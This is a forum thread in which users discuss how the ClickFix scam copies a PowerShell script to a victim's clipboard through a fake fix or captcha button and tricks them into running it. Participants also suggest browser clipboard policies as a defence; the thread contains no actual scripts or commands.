Clickfix malware: how can the miscreants load up the clipboard?

Quartz · 29 Mar 2025 at 13:02

I understand the latest malware scam is called Clickfix and tricks people into running malware. It does this by loading a script into the clipboard and tricking people into running it. How does it load the script into the clipboard?

I expect Google and Microsoft to fix this PDQ.

Mcnumpty2323 · 29 Mar 2025 at 14:56

May be newer versions of it
But I thought it literally does what the name suggests
Pops up an error message
With click to fix this
Clicking it copies it to the clipboard

Or by putting up a fake captcha
Clicking verify i am human copies it to the clipboard

KIA · 31 Mar 2025 at 14:08

This JavaScript snippet decodes and displays a payload, manages modal interactions for user feedback, and provides functionality for copying content to the clipboard upon user action.

In a nutshell, clicking on the “How to fix” button triggers the execution of JavaScript code that copies the PowerShell script directly onto the clipboard. This script, as previously discussed, includes commands to download and execute an HTA file from a remote server.

https://www.mcafee.com/blogs/other-blogs/mcafee-labs/clickfix-deception-a-social-engineering-tactic-to-deploy-malware/

Quartz · 31 Mar 2025 at 14:22

Chrome just got updated. Let's hope that the update has fixed this.

andshrew · 1 Apr 2025 at 04:42

Not quite sure what the excitement is over this is, it's malware 101 isn't it? Trick the user into doing something.

Even if the command is copied to your clipboard, you still need to run it manually. You could change the browser clipboard permission default so that action is required by the user before a web site can access it, but guess what. If the user is being tricked into doing this in the first place, they'll be tricked into clicking OK on that prompt first too.

If you want to do that for your own peace of mind, set the policy on your browser to prompt you or set it so that only a pre-determined list of URLs can access it:

Chrome Enterprise Policy List & Management | Documentation

Chrome Enterprise policies for businesses and organizations to manage Chrome Browser and ChromeOS.

chromeenterprise.google

Quartz · 1 Apr 2025 at 08:55

andshrew said:
Not quite sure what the excitement is over this is, it's malware 101 isn't it? Trick the user into doing somethin

This thread is about loading stuff into the computer's clipboard. How does the malware do it (explained above) and how is it allowed to do it in the first place.

andshrew · 1 Apr 2025 at 11:39

Quartz said:
This thread is about loading stuff into the computer's clipboard. How does the malware do it (explained above) and how is it allowed to do it in the first place.

It can do it because accessing the clipboard is a standard web API call: https://developer.mozilla.org/en-US/docs/Web/API/Clipboard_API

It's trivial to have a button on a web page which copys text into your clipboard. It's not so easy to convince the user to then paste that into the right place where it can then be executed and do some halm.

Murphy · 1 Apr 2025 at 11:43

andshrew said:
It's trivial to have a button on a web page which copys text into your clipboard. It's not so easy to convince the user to then paste that into the right place where it can then be executed and do some halm.

I could be wrong but i think what @Quartz is asking is how it runs the code once it's been copied to the clipboard.

andshrew · 1 Apr 2025 at 11:48

Murphy said:
I could be wrong but i think what @Quartz is asking is how it runs the code once it's been copied to the clipboard.

It doesn't, as far as I can tell. The user has to be further tricked into pasting it somewhere that the command will run, like the command prompt or the run box.

Quartz · 1 Apr 2025 at 22:00

andshrew said:
It can do it because accessing the clipboard is a standard web API call:

Right. I can understand the web page having read access but not write access. The browser itself will need write access.

Murphy · 2 Apr 2025 at 07:37

Quartz said:
Right. I can understand the web page having read access but not write access. The browser itself will need write access.

You mean like when you copy & past something from a website?

e: Honestly I'm struggling to see what's so special about Clickfix, from what i can tell it's your basic social engineering type of attack. Try to make someone think something bad has happened to get them to do something they shouldn't like download and run a program or in this case run a snippet of code.

throwaway4372 · 2 Apr 2025 at 07:44

Quartz said:
Right. I can understand the web page having read access but not write access. The browser itself will need write access.

Click to copy is a thing yes. That's not new.

Quartz · 2 Apr 2025 at 07:46

And a thing we can do without.

yashiro · Sunday at 13:52

Upon visiting, victims are redirected to domains hosting fake popup windows that instruct them to paste a script into a PowerShell terminal.

The attackers’ additional instruction to press Windows+R (which opens the Run dialog) and then press CTRL+V (which pastes the contents from the clipboard)

You'd need to be a bit clueless to do any of this. "Paste this code into your system and run it. Trust me bro."
I'm sure it will catch a good amount of today's web users.